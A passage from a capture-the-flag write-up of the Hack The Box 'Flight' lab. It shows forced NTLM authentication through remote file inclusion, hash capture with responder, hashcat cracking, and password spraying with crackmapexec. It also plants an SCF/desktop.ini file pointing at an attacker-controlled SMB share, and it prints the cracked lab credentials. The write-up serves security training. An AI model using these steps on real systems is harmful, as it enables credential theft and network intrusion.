./fuzz-output.csv,csv -c -w ../Common/file_inclusion_windows.txt --hw 89,95 http://school.flight.htb/index.php?view=FUZZ</code></span></span></p></div><div id="https://www.notion.so/0f0452194d234202b7580a294ac9746f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After digging through the results for hours, we were unable to find any useful files.</span></span></p></div><div id="https://www.notion.so/478bf07c6608440ca004744a49fa4f3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Abusing RFI to force authentication</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/e2c8add77e9844838ac548c775119b0f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It then occurred to me that this is not only a local file inclusion vulnerability, but also a remote one (RFI) too. If the site is able to resolve remote addresses, we could also try to capture the NTLM hash of the account running the web server by making it authenticate against our SMB share. We can do this by setting up </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">responder</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/e8d05da1891a45fe9f9fa745e3f584be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo responder -I tun0</code></span></span></p></div><div id="https://www.notion.so/729271befd3042bcab84dcc8dbb339fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we trigger the forced NTLM authentication by navigating to:</span></span></p></div><div id="https://www.notion.so/db81e02fc1a74541907b83a19e0a2579" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=//10.10.14.47/share</code></span></span></p></div><pre id="https://www.notion.so/948ba87dc7fe45069b2bf2fdf509a305" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:cb2f5e5efd7e920b:BCE6AE9F4AD11DE7BC8DE3603EF2FDA9:010100000000000080BB6CFE073FD9010F1732745B23B572000000000200080035004E004900440001001E00570049004E002D004100590037004400310054005300500038004F004A0004003400570049004E002D004100590037004400310054005300500038004F004A002E0035004E00490044002E004C004F00430041004C000300140035004E00490044002E004C004F00430041004C000500140035004E00490044002E004C004F00430041004C000700080080BB6CFE073FD901060004000200000008003000300000000000000000000000003000007B33338D204100C112F4C6A36B0E281D5DE757828F78B95F49DA870D676064560A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310035000000000000000000</span></span></span></code></pre><div id="https://www.notion.so/72c09e30a6ea49e18b4102144708f8c3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Bingo! We’ve received the hash for a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> service account. Normally, service accounts have secure passwords that should be near-impossible to crack, but let’s copy it to a file and try to crack it anyway:</span></span></p></div><div id="https://www.notion.so/2d28fcde0efc45afb6b01a58a461d0e9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat svc_apache.hash</code></span></span></p></div><pre id="https://www.notion.so/3cd0c0eda1d546c59be1c1c2e69712a8" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>svc_apache::flight:aaaaaaaaaaaaaaaa:11ad222990af24ab957608f38c26ecf1:01010000000000000090e8dda52dd90158e9f2a689392db30000000001001000740068004c006a0079004b004d00450003001000740068004c006a0079004b004d0045000200100054004a00620042004e006e00690045000400100054004a00620042004e006e0069004500070008000090e8dda52dd9010600040002000000080030003000000000000000000000000030000090bd851c7abaf60cd04a44fdfaddfb42787487148e450d50537f135845ef040b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000</span></span></span></code></pre><div id="https://www.notion.so/cc753404085b49cebf66c15842d93f50" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Cracking svc_apache’s hash and checking new access</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/1f77d8a7dc0841a88f15c4a44091ad2f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the standard </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">rockyou.txt</code></span><span class="SemanticString"> wordlist, we try to crack the password with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hashcat</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/56e82d35d2e34d90a51704a30c0e6d0c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ hashcat -m 5600 ./svc_apache.hash ../../rockyou.txt -o svc_apache.txt</code></span></span></p></div><pre id="https://www.notion.so/4651cf7ccc964dffac2d02073a822918" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>hashcat (v6.1.1) starting...
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:11ad222990af24ab957608f38c26ecf1:01010000000000000090e8dda52dd90158e9f2a689392db30000000001001000740068004c006a0079004b004d00450003001000740068004c006a0079004b004d0045000200100054004a00620042004e006e00690045000400100054004a00620042004e006e0069004500070008000090e8dda52dd9010600040002000000080030003000000000000000000000000030000090bd851c7abaf60cd04a44fdfaddfb42787487148e450d50537f135845ef040b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SVC_APACHE::flight:aaaaaaaaaaaaaaaa:11ad222990af24a...000000
Time.Started.....: Sun Feb 12 17:34:32 2023 (6 secs)
Time.Estimated...: Sun Feb 12 17:34:38 2023 (0 secs)
Guess.Base.......: File (../../rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1831.6 kH/s (1.46ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10665984/14344385 (74.36%)
Rejected.........: 0/10665984 (0.00%)
Restore.Point....: 10661888/14344385 (74.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: SAESH21 -> Ryanpetter</span></span></span></code></pre><div id="https://www.notion.so/9d24dd8096d14650a095f50f97549d3a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Surprisingly, it was able to crack the password! We now have the credentials </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache:S@Ss!K@*t13</code></span><span class="SemanticString">. Let’s go back to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ldapsearch</code></span><span class="SemanticString"> and see if we can uncover anything new:</span></span></p></div><div id="https://www.notion.so/8060509488bc4868ad7da5c987b19933" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h 10.10.11.187 -D 'svc_apache@flight.htb' -w 'S@Ss!K@*t13' -b "DC=flight,DC=htb"</code></span></span></p></div><div id="https://www.notion.so/6826ff5224e24ab78e89174e1612200e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Unfortunately, this was a dead end and nothing of interest was found. Let’s see what services we can access with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">crackmapexec</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/6e07643f1ab04d56a4fd09ac701e758a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'</code></span></span></p></div><pre id="https://www.notion.so/c7f230baa4cd4a76a6e61b0ba6f5cf91" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP 10.10.11.187 5985 G0 [*] http://10.10.11.187:5985/wsman
WINRM 10.10.11.187 5985 G0 [-] flight.htb\svc_apache:S@Ss!K@*t13</span></span></span></code></pre><div id="https://www.notion.so/348e698a967a4b90aa60934dd3e505d6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like WinRM login may be disabled, which is not uncommon for service accounts. How about SMB?</span></span></p></div><div id="https://www.notion.so/81aa9001febb4e7aa091f436947212a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'</code></span></span></p></div><pre id="https://www.notion.so/b9ee9979175f455087c5233d667cba30" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13</span></span></span></code></pre><div id="https://www.notion.so/bfb0c0cc5fd14a30b0cbbb3ab74befab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Nice! We can authenticate as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> on SMB, let’s try to enumerate for more information such as users and shares:</span></span></p></div><div id="https://www.notion.so/8424a0efa8d5428cb2fe11e734cd99dc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users</code></span></span></p></div><pre id="https://www.notion.so/c2c3f1a06d4d410db1cb88ac48be47c9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] Error enumerating domain users using dc ip 10.10.11.187: unsupported hash type MD4
SMB 10.10.11.187 445 G0 [*] Trying with SAMRPC protocol
SMB 10.10.11.187 445 G0 [+] Enumerated domain user(s)
SMB 10.10.11.187 445 G0 flight.htb\Administrator Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 flight.htb\Guest Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 flight.htb\krbtgt Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 flight.htb\S.Moon Junion Web Developer
SMB 10.10.11.187 445 G0 flight.htb\R.Cold HR Assistant
SMB 10.10.11.187 445 G0 flight.htb\G.Lors Sales manager
SMB 10.10.11.187 445 G0 flight.htb\L.Kein Penetration tester
SMB 10.10.11.187 445 G0 flight.htb\M.Gold Sysadmin
SMB 10.10.11.187 445 G0 flight.htb\C.Bum Senior Web Developer
SMB 10.10.11.187 445 G0 flight.htb\W.Walker Payroll officer
SMB 10.10.11.187 445 G0 flight.htb\I.Francis Nobody knows why he's here
SMB 10.10.11.187 445 G0 flight.htb\D.Truff Project Manager
SMB 10.10.11.187 445 G0 flight.htb\V.Stevens Secretary
SMB 10.10.11.187 445 G0 flight.htb\svc_apache Service Apache web
SMB 10.10.11.187 445 G0 flight.htb\O.Possum Helpdesk</span></span></span></code></pre><div id="https://www.notion.so/269d7f860c9545d9b1ed4f8fb71bb510" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We’ll save these usernames into a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users.txt</code></span><span class="SemanticString"> file, as they might come in handy later. In addition, we can also enumerate for shares accessible by </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/40e40be10bac4f038bd91f4f4888a983" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --shares</code></span></span></p></div><pre id="https://www.notion.so/76cb369e159f454d92e7f5488aa000c2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ</span></span></span></code></pre><div id="https://www.notion.so/15d0c38987734e7a89ed6a5c4db438e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We are able to access a few shares, Shared, Users and Web being the non-standard shares. However, there weren’t any useful files and we only have read permissions.</span></span></p></div><div id="https://www.notion.so/7a055536dd854c8d9e47f4d44a56e4e1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Discovering password reuse with S.Moon</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/8a9f5f9acf23428ba4d3b5ff75c21768" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After many hours of digging, I tried checking if there was any password reuse by checking </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">'s password against the other users:</span></span></p></div><div id="https://www.notion.so/bc6dcdfb3f0f49a48f7805b0315f1f02" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success</code></span></span></p></div><pre id="https://www.notion.so/e80feaf3957040c2bb141b6ede4fa32d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE</span></span></span></code></pre><div id="https://www.notion.so/6779b608896746f2b96339080d02e417" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To my shock, the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">S.Moon</code></span><span class="SemanticString"> user actually shares the same password as the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> service account! It is at this point that I thought to myself, “Why didn’t I think of trying this earlier! It could have saved me so much time!”, but hindsight is always 20/20.</span></span></p></div><div id="https://www.notion.so/1e2d390e4c34483da2c67c3cab3a8a00" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">S.Moon</code></span><span class="SemanticString"> credentials, we find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share is now writable:</span></span></p></div><div id="https://www.notion.so/c965a224673a46bab3ea624c28a32503" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' --shares</code></span></span></p></div><pre id="https://www.notion.so/e2ec1c0f525d488ab112c82f30c9b96f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ</span></span></span></code></pre><div id="https://www.notion.so/d02234a1130444e8bba23abd08cbb5ba" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SCF file attack to gather hashes</strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/a477e2986a294510bb99a8bb84c2150a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Assuming that the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share is frequently visited by users, we use an SCF file attack to try and capture one of the users’ NTLM hash. We can do this by creating the following file:</span></span></p></div><pre id="https://www.notion.so/43111338a8104af98577259a8f8c81ed" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[Shell]
Command=2
IconFile=\\10.10.14.15\share\hello.ico
[Taskbar]
Command=ToggleDesktop</span></span></span></code></pre><div id="https://www.notion.so/7ffdfa7455e14c68baeb9efb57ce469b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IconFile</code></span><span class="SemanticString"> attribute is set to a non-existent share on our address. When a user’s desktop loads this file, it will try to look for the icon on our SMB share, thus authenticating and sending us the NTLM hash in the process. We save the file as an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.ini</code></span><span class="SemanticString"> file (e.g. </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">desktop.ini</code></span><span class="SemanticString">), then upload the file to the writable </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share after mounting it locally.</span></span></p></div><div id="https://www.notion.so/256e00b1bca44da280ad8208c28e1e51" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Once again, we set up </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">responder</code></span><span class="SemanticString"> to capture the hash:</span></span></p></div><div id="https://www.notion.so/b0feb73054e945a1a4c75d6181b4f75c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo responder -I tun0</code></span></span></p></div><pre id="https://www.notion.so/ca721a354bb742038ab7a5f17111b211" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:161e34a8843e502b:1BFD3E148E1D25D6CAD923642D7BB8F9:0101000000000000801C228D8A3FD901EDDF1F50DA332A590000000002000800370049003400430001001E00570049004E002D004300530033004400560039004300370030004700380004003400570049004E002D00430053003300440056003900430037003000470038002E0037004900340043002E004C004F00430041004C000300140037004900340043002E004C004F00430041004C000500140037004900340043002E004C004F00430041004C0007000800801C228D8A3FD901060004000200000008003000300000000000000000000000003000007B33338D204100C112F4C6A36B0E281D5DE757828F78B95F49DA870D676064560A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310035000000000000000000</span></span></span></code></pre><div id="https://www.notion.so/695e8f4a184943dfa65aa09e29a2ea1d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After a short wait, we see that a user by the name </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> has triggered the remote query. Using the process detailed above, we crack the hash using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hashcat</code></span><span class="SemanticString"> and we get the credentials: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum:Tikkycoll_431012284</code></span><span class="SemanticString"> </span></span></p></div><div id="https://www.notion.so/a0875a187abc486ca72f3d17674b79b7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p 